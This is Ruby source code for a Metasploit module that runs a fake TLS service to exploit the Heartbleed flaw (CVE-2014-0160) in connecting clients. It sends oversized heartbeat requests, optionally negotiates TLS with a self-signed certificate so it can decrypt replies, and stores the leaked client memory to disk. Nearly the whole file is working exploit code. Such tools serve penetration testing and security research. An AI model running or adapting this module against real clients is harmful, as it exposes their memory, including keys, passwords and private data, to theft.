## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report def initialize super( 'Name' => 'OpenSSL Heartbeat (Heartbleed) Client Memory Exposure', 'Description' => %q{ This module provides a fake SSL service that is intended to leak memory from client systems as they connect. This module is hardcoded for using the AES-128-CBC-SHA1 cipher. }, 'Author' => [ 'Neel Mehta', # Vulnerability discovery 'Riku', # Vulnerability discovery 'Antti', # Vulnerability discovery 'Matti', # Vulnerability discovery 'hdm' # Metasploit module ], 'License' => MSF_LICENSE, 'Actions' => [['Capture']], 'PassiveActions' => ['Capture'], 'DefaultAction' => 'Capture', 'References' => [ [ 'CVE', '2014-0160' ], [ 'US-CERT-VU', '720951' ], [ 'URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A' ], [ 'URL', 'http://heartbleed.com/' ] ], 'DisclosureDate' => 'Apr 07 2014', 'Notes' => { 'AKA' => ['Heartbleed'] } ) register_options( [ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8443 ]), OptInt.new('HEARTBEAT_LIMIT', [true, "The number of kilobytes of data to capture at most from each client", 512]), OptInt.new('HEARTBEAT_READ', [true, "The number of bytes to leak in the heartbeat response", 65535]), OptBool.new('NEGOTIATE_TLS', [true, "Set this to true to negotiate TLS and often leak more data at the cost of CA validation", false]) ]) end # Initialize the client state and RSA key for this session def setup super @state = {} @cert_key = OpenSSL::PKey::RSA.new(1024){ } if negotiate_tls? end # Setup the server module and start handling requests def run print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...") exploit end # Determine how much memory to leak with each request def heartbeat_read_size datastore['HEARTBEAT_READ'].to_i end # Determine how much heartbeat data to capture at the most def heartbeat_limit datastore['HEARTBEAT_LIMIT'].to_i * 1024 end # Determine whether we should negotiate TLS or not def negotiate_tls? !! datastore['NEGOTIATE_TLS'] end # Initialize a new state for every client def on_client_connect(c) @state[c] = { :name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :heartbeats => "", :server_random => [Time.now.to_i].pack("N") + Rex::Text.rand_text(28) } print_status("#{@state[c][:name]} Connected") end # Buffer messages and parse them once they are fully received def on_client_data(c) data = c.get_once return if not data @state[c][:buff] ||= "" @state[c][:buff] << data process_request(c) end # Extract TLS messages from the buffer and process them def process_request(c) # Make this slightly harder to DoS if @state[c][:buff].to_s.length > (1024*128) print_status("#{@state[c][:name]} Buffer limit reached, dropping connection") c.close return end # Process any buffered messages loop do break unless @state[c][:buff] message_type, message_ver, message_len = @state[c][:buff].unpack("Cnn") break unless message_len break unless @state[c][:buff].length >= message_len+5 mesg = @state[c][:buff].slice!(0, message_len+5) if @state[c][:encrypted] process_openssl_encrypted_request(c, mesg) else process_openssl_cleartext_request(c, mesg) end end end # Process cleartext TLS messages def process_openssl_cleartext_request(c, data) message_type, message_version, protocol_version = data.unpack("Cn@9n") if message_type == 0x15 and data.length >= 7 message_level, message_reason = data[5,2].unpack("CC") print_status("#{@state[c][:name]} Alert Level #{message_level} Reason #{message_reason}") if message_level == 2 and message_reason == 0x30 print_status("#{@state[c][:name]} Client rejected our certificate due to unknown CA") return end if level == 2 print_status("#{@state[c][:name]} Client rejected our connection with a fatal error: #{message_reason}") return end end unless message_type == 0x18 message_code = data[5,1].to_s.unpack("C").first vprint_status("#{@state[c][:name]} Message #{sprintf("type %.2x v%.4x %.2x", message_type, message_version, message_code)}") end # Process the Client Hello unless @state[c][:received_hello] unless (message_type == 0x16 and data.length > 43 and message_code == 0x01) print_status("#{@state[c][:name]} Expected a Client Hello, received #{sprintf("type %.2x code %.2x", message_type, message_code)}") return end print_status("#{@state[c][:name]} Processing Client Hello...") # Extract the client_random needed to compute the master key @state[c][:client_random] = data[11,32] @state[c][:received_hello] = true print_status("#{@state[c][:name]} Sending Server Hello...") openssl_send_server_hello(c, data, protocol_version) return end # If we are negotiating TLS, handle Client Key Exchange/Change Cipher Spec if negotiate_tls? # Process the Client Key Exchange if message_type == 0x16 and data.length > 11 and message_code == 0x10 print_status("#{@state[c][:name]} Processing Client Key Exchange...") premaster_length = data[9, 2].unpack("n").first # Extract the pre-master secret in encrypted form if data.length >= 11 + premaster_length premaster_encrypted = data[11, premaster_length] # Decrypt the pre-master secret using our RSA key premaster_clear = @cert_key.private_decrypt(premaster_encrypted) rescue nil @state[c][:premaster] = premaster_clear if premaster_clear end end # Process the Change Cipher Spec and switch to encrypted communications if message_type == 0x14 and message_code == 0x01 print_status("#{@state[c][:name]} Processing Change Cipher Spec...") initialize_encryption_keys(c) return end # Otherwise just start capturing heartbeats in clear-text mode else # Send heartbeat requests if @state[c][:heartbeats].length < heartbeat_limit openssl_send_heartbeat(c, protocol_version) end # Process cleartext heartbeat replies if message_type == 0x18 vprint_status("#{@state[c][:name]} Heartbeat received (#{data.length-5} bytes) [#{@state[c][:heartbeats].length} bytes total]") @state[c][:heartbeats] << data[5, data.length-5] end # Full up on heartbeats, disconnect the client if @state[c][:heartbeats].length >= heartbeat_limit print_status("#{@state[c][:name]} Heartbeats received [#{@state[c][:heartbeats].length} bytes total]") store_captured_heartbeats(c) c.close() end end end # Process encrypted TLS messages def process_openssl_encrypted_request(c, data) message_type, message_version, protocol_version = data.unpack("Cn@9n") return if @state[c][:shutdown] return unless data.length > 5 buff = decrypt_data(c, data[5, data.length-5]) unless buff print_error("#{@state[c][:name]} Failed to decrypt, giving up on this client") c.close return end message_code = buff[0,1].to_s.unpack("C").first vprint_status("#{@state[c][:name]} Message #{sprintf("type %.2x v%.4x %.2x", message_type, message_version, message_code)}") if message_type == 0x16 print_status("#{@state[c][:name]} Processing Client Finished...") end # Send heartbeat requests if @state[c][:heartbeats].length < heartbeat_limit openssl_send_heartbeat(c, protocol_version) end # Process heartbeat replies if message_type == 0x18 vprint_status("#{@state[c][:name]} Encrypted heartbeat received (#{buff.length} bytes) [#{@state[c][:heartbeats].length} bytes total]") @state[c][:heartbeats] << buff end # Full up on heartbeats, disconnect the client if @state[c][:heartbeats].length >= heartbeat_limit print_status("#{@state[c][:name]} Encrypted heartbeats received [#{@state[c][:heartbeats].length} bytes total]") store_captured_heartbeats(c) c.close() end end # Dump captured memory to a file on disk using the loot API def store_captured_heartbeats(c) if @state[c][:heartbeats].length > 0 begin path = store_loot( "openssl.heartbleed.client", "application/octet-stream", @state[c][:ip], @state[c][:heartbeats], nil, "OpenSSL Heartbleed client memory" ) print_good("#{@state[c][:name]} Heartbeat data stored in #{path}") rescue ::Interrupt raise $! rescue ::Exception print_error("#{@state[c][:name]} Heartbeat data could not be stored: #{$!.class} #{$!}") end # Report the memory disclosure as a vulnerability on the host report_vuln({ :host => @state[c][:ip], :name => self.name, :info => "Module #{self.fullname} successfully dumped client memory contents", :refs => self.references, :exploited_at => Time.now.utc }) rescue nil # Squash errors related to ip => and the like end # Clear the heartbeat array @state[c][:heartbeats] = "" @state[c][:shutdown] = true end # Delete the state on connection close def on_client_close(c) # Do we have any pending heartbeats to save? if @state[c][:heartbeats].length > 0 store_captured_heartbeats(c) end @state.delete(c) end # Send an OpenSSL Server Hello response def openssl_send_server_hello(c, hello, version) # If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the # first cipher suite sent by the client. if @state[c][:encrypted] cipher = "\x00\x2F" else cipher = hello[46, 2] end # Create the Server Hello response extensions = "\x00\x0f\x00\x01\x01" # Heartbeat server_hello_payload = [version].pack('n') + # Use the protocol version sent by the client. @state[c][:server_random] + # Random (Timestamp + Random Bytes) "\x00" + # Session ID cipher + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA) "\x00" + # Compression Method (none) [extensions.length].pack('n') + extensions server_hello = [0x02].pack("C") + [ server_hello_payload.length ].pack("N")[1,3] + server_hello_payload msg1 = "\x16" + [version].pack('n') + [server_hello.length].pack("n") + server_hello c.put(msg1) # Skip the rest of TLS if we arent negotiating it unless negotiate_tls? # Send a heartbeat request to start the stream and return openssl_send_heartbeat(c, version) return end # Certificates certs_combined = generate_certificates pay2 = "\x0b" + [ certs_combined.length + 3 ].pack("N")[1, 3] + [ certs_combined.length ].pack("N")[1, 3] + certs_combined msg2 = "\x16" + [version].pack('n') + [pay2.length].pack("n") + pay2 c.put(msg2) # End of Server Hello pay3 = "\x0e\x00\x00\x00" msg3 = "\x16" + [version].pack('n') + [pay3.length].pack("n") + pay3 c.put(msg3) end # Send the heartbeat request that results in memory exposure def openssl_send_heartbeat(c, version) c.put "\x18" + [version].pack('n') + "\x00\x03\x01" + [heartbeat_read_size].pack("n") end # Pack the certificates for use in the TLS reply def generate_certificates certs = [] certs << generate_certificate.to_der certs_combined = certs.map { |cert| [ cert.length ].pack("N")[1, 3] + cert }.join end # Generate a self-signed certificate to use for the service def generate_certificate key = @cert_key cert = OpenSSL::X509::Certificate.new cert.version = 2 cert.serial = rand(0xFFFFFFFF) subject_cn = Rex::Text.rand_hostname subject = OpenSSL::X509::Name.new([ ["C","US"], ['ST', Rex::Text.rand_state()], ["L", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize], ["O", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize], ["CN", subject_cn], ]) issuer = OpenSSL::X509::Name.new([ ["C","US"], ['ST', Rex::Text.rand_state()], ["L", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize], ["O", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize], ["CN", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize], ]) cert.subject = subject cert.issuer = issuer cert.not_before = Time.now - (3600 * 24 * 365) + rand(3600 * 14) cert.not_after = Time.now + (3600 * 24 * 365) + rand(3600 * 14) cert.public_key = key.public_key ef = OpenSSL::X509::ExtensionFactory.new(nil,cert) cert.extensions = [ ef.create_extension("basicConstraints","CA:FALSE"), ef.create_extension("subjectKeyIdentifier","hash"), ef.create_extension("extendedKeyUsage","serverAuth"), ef.create_extension("keyUsage","keyEncipherment,dataEncipherment,digitalSignature") ] ef.issuer_certificate = cert cert.add_extension ef.create_extension("authorityKeyIdentifier", "keyid:always,issuer:always") cert.sign(key, OpenSSL::Digest::SHA1.new) cert end # Decrypt the TLS message and return the result without the MAC def decrypt_data(c, data) return unless @state[c][:client_enc] cipher = @state[c][:client_enc] begin buff = cipher.update(data) buff << cipher.final # Trim the trailing MAC signature off the buffer if buff.length >= 20 return buff[0, buff.length-20] end rescue ::OpenSSL::Cipher::CipherError => e print_error("#{@state[c][:name]} Decryption failed: #{e}") end nil end # Calculate keys and toggle encrypted status def initialize_encryption_keys(c) tls1_calculate_crypto_keys(c) @state[c][:encrypted] = true end # Determine crypto keys for AES-128-CBC based on the master secret def tls1_calculate_crypto_keys(c) @state[c][:master] = tls1_calculate_master_key(c) return unless @state[c][:master] key_block = tls1_prf( @state[c][:master], "key expansion" + @state[c][:server_random] + @state[c][:client_random], (20 * 2) + (16 * 4) ) # Extract the MAC, encryption, and IV from the keyblock @state[c].update({ :client_write_mac_key => key_block.slice!(0, 20), :server_write_mac_key => key_block.slice!(0, 20), :client_write_key => key_block.slice!(0, 16), :server_write_key => key_block.slice!(0, 16), :client_iv => key_block.slice!(0, 16), :server_iv => key_block.slice!(0, 16), }) client_cipher = OpenSSL::Cipher.new('aes-128-cbc') client_cipher.key = @state[c][:client_write_key] client_cipher.iv = @state[c][:client_iv] client_cipher.decrypt client_mac = OpenSSL::HMAC.new(@state[c][:client_write_mac_key], OpenSSL::Digest.new('sha1')) server_cipher = OpenSSL::Cipher.new('aes-128-cbc') server_cipher.key = @state[c][:server_write_key] server_cipher.iv = @state[c][:server_iv] server_cipher.encrypt server_mac = OpenSSL::HMAC.new(@state[c][:server_write_mac_key], OpenSSL::Digest.new('sha1')) @state[c].update({ :client_enc => client_cipher, :client_mac => client_mac, :server_enc => server_cipher, :server_mac => server_mac }) true end # Determine the master key from the premaster and client/server randoms def tls1_calculate_master_key(c) return unless ( @state[c][:premaster] and @state[c][:client_random] and @state[c][:server_random] ) tls1_prf( @state[c][:premaster], "master secret" + @state[c][:client_random] + @state[c][:server_random], 48 ) end # Random generator used to calculate key data for TLS 1.0/1.1 def tls1_prf(input_secret, input_label, output_length) # Calculate S1 and S2 as even blocks of each half of the secret # string. If the blocks are uneven, then S1's last byte should # be duplicated by S2's first byte blen = (input_secret.length / 2.0).ceil s1 = input_secret[0, blen] s2_index = blen if input_secret.length % 2 != 0 s2_index -= 1 end s2 = input_secret[s2_index, blen] # Hash the first part with MD5 out1 = tls1_p_hash('md5', s1, input_label, output_length).unpack("C*") # Hash the second part with SHA1 out2 = tls1_p_hash('sha1', s2, input_label, output_length).unpack("C*") # XOR the results together [*(0..out1.length-1)].map {|i| out1[i] ^ out2[i] }.pack("C*") end # Used by tls1_prf to generate arbitrary amounts of session key data def tls1_p_hash(digest, secret, label, olen) output = "" chunk = OpenSSL::Digest.new(digest).digest_length ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest)) ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest)) ctx.update(label) a1 = ctx.digest loop do ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest)) ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest)) ctx.update(a1) ctx_tmp.update(a1) ctx.update(label) if olen > chunk output << ctx.digest a1 = ctx_tmp.digest olen -= chunk else a1 = ctx.digest output << a1[0, olen] break end end output end end